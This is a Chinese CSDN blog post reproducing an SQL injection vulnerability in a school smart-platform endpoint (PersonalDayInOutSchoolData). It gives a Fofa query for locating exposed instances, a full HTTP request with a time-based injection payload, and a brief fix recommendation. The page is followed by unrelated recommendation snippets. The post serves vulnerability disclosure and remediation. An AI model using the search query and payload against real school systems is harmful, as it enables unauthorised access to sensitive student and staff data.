5pm65oWn5bmz5Y+wIFBlcnNvbmFsRGF5SW5PdXRTY2hvb2xEYXRh SQL注入漏洞复现

于 2024-09-20 17:14:22 发布
阅读量202 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142390332
版权

0x01 漏洞描述:

 5pm65oWn5bmz5Y+w的目的为全面改革,智能化教育,智慧平台UGVyc29uYWxEYXlJbk91dFNjaG9vbERhdGE=存在SQL注入漏洞,攻击者可通过该漏洞获取数据敏感信息。

0x02 搜索语句:

Fofa:body="custom/blue/uimaker/easyui.css"

0x03 漏洞复现:

POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&AccountNo=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

      

0x04 修复建议:

对参数进行预编译处理,同时限制输入的特殊字符。

iSee857
关注
专栏目录
EDU 某智慧平台 PersonalDayInOutSchoolData SQL注入漏洞复现
0xSec
09-20 642
EDU 某智慧平台 PersonalDayInOutSchoolData 存在SQL注入漏洞,攻击者可获取数据库敏感信息,导致信息泄露,深入利用可获取服务器权限。
HTML5对手机页面长按会粘贴复制禁用的解决方法
12-13
解决方法如下所示: 直接在CSS 文件中添加下面的代码,就可以实现了在手机端禁止粘贴复制的功能: ... *{ -webkit-touch-callout:none; /*系统默认菜单被禁用*/ -webkit-user-select:none; /*webkit浏览器*/ ...
智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞
最新发布
weixin_43167326的博客
09-20 652
智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞,攻击者可通过该漏洞获取数据敏感信息。。
世界银行从移民视角看COVID19危机的恢复力(英文)2021.5(56页).pdf
02-09
这项研究得到了欧洲委员会、德国国际合作机构(GIZ)代表德国联邦经济合作与发展部(BMZ)以及瑞士发展与合作署(SDC)的支持。这些机构是KNOMAD信托基金的贡献者。 4. **独立观点**: 报告中的观点不代表世界...
zen cart1.39h中文插件模板完美集成版(自带5个模板)
05-06
这个“Zen Cart 1.39h中文插件模板完美集成版”特别强调了其对中国市场的适应性,包含了中文语言支持,并且预装了5个不同的模板,以满足不同商家对于网站外观和用户体验的需求。 首先,让我们了解一下Zen Cart的...
Kb00m:基于 JXTA 2.7 (JXSE) 的 Peer2Peer 应用程序
06-10
这是一个基于 JXTA v2.7 的 peer2peer 应用程序,它允许基于证书保护的聊天、消息和文件传输。 这是一个实现 JXTA 的个人项目,但由于不再支持 JXTA,我无法正确完成它... 我正在寻找有兴趣继续该项目并且对 Java...
zencart图片管理插件(Image_Handler4_v4_2插件)
06-21
《ZenCart图片管理插件——Image_Handler4_v4_2深度解析》 ZenCart作为一款开源的电子商务解决方案,为商家提供了强大的在线商店管理功能。在众多的插件中,Image_Handler4_v4_2插件以其高效、便捷的图片管理特性,...
mz80b_de0:Altera DE0 板的 MZ-80BMZ-2000 系列实现
06-29
FPGA 上的 MZ-80B这是什么? 这是夏普 MZ-80B/MZ-2000 系列到 FPGA 的实现。要求Altera(Terasic) DE0 板Quartus II(我使用 13.1.4,64 位) SD、SDHC 或 MMC 卡如何再现项目下载文件。 创建文件夹以在您的 PC 中...
基于计算机视觉的人脸情绪识别系统python源码(含模型+项目说明).zip
07-01
conda create -n FER python=3.8 -y conda activate FER pip install torch==1.12.0 gradio==4.29.0 torchvision==0.13.0 opencv-python==3.4.15.55 h5py==3.11.0 ``` 演示 预训练模型已经传到百度网盘,[连接]...
ftpm_161_bmz.zip
05-07
ftpm_161_bmz.zip
Pytorch框架基于深度学习实现RAF-DB数据集人脸情绪识别源码+模型+项目说明(可作毕设).zip
07-01
【2】项目主要针对各个计算机相关专业,包括计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网等领域的在校学生、专业教师或企业员工使用。 【3】项目具有较高的学习借鉴价值,不仅适用于小白学习入门...
基于CNN卷积神经网络和RAF-DB数据集实现人脸表情识别python源码+训练好的模型+使用说明(准确率99.9%).zip
07-25
2、适用人群:计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工下载使用。 3、用途:项目具有较高的学习借鉴价值,不仅适用于...
publicApi:saas化的基础服务平台,由 [ThinkPhp](http
06-28
通过单层base64加密后为:cHVibGljQXBp5piv5Liq5YWN6LS555qE5byA5rqQ5Z+656GA5pyN5Yqh5bmz5Y+w 最后请求url为: 效果图 UEditor Php版本在线集成 非跨域部署 独立部署的时候,请更改 /ueditor/php/config.json 文件...
EAN13条码生成条码生成
04-07
条码生成Function EAN13(BM As String ) Private BM Dimension EAN_code[10,3] EAN_code[1,1]='00000011110011' EAN_code[1,2]='00110000111111' ...EAN_mode[3]=EAN_mode[3]+EAN_code[BMZ+1,MODE] Endf Endi Endf
锂电设备行业点评:特斯拉情况向好,海外车企动作催化锂电设备行业.pdf
07-12
以每GWh设备投资2.5亿计算,市场空间预计将达到1500-1750亿元人民币。 目前,锂电设备行业的主要受益厂家包括LG、宁德时代、Northvolt等,以及孚能、BMZ集团等。这些企业已经在海外市场上表现出强劲的增长势头。...
音频信号的采样与重构等matlab代码数字信号处理.docx
09-14
FIR滤波器的系统函数为:H(z) = b0 + b1z^-1 + b2z^-2 + … + bmz^-m 二、快速傅立叶变换(FFT) 快速傅立叶变换是一种快速 FOURIER 变换算法。它可以将信号从时域变换到频域,实现信号的频谱分析。FFT算法的优越性...
智慧银行-银行大数据信息化建设方案.docx
04-22
1. **国家标准**:参照《涉及国家秘密的计算机信息系统安全保密测评指南》BMZ3-2001等相关国家标准。 2. **行业标准**:采用银行业的通用标准和技术规范,确保系统的兼容性与互操作性。 3. **国际标准**:借鉴ISO/...
UNWTO-全球女性参与旅游业报告(英文)--192页.pdf
07-28
这份报告是2010年首版的延续,旨在更新对女性在旅游行业状况的理解,并评估旅游业对联合国可持续发展目标5(实现性别平等并赋权所有女性和女孩)的贡献。 报告覆盖了更广泛的地理范围,增加了深入的行业分析,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值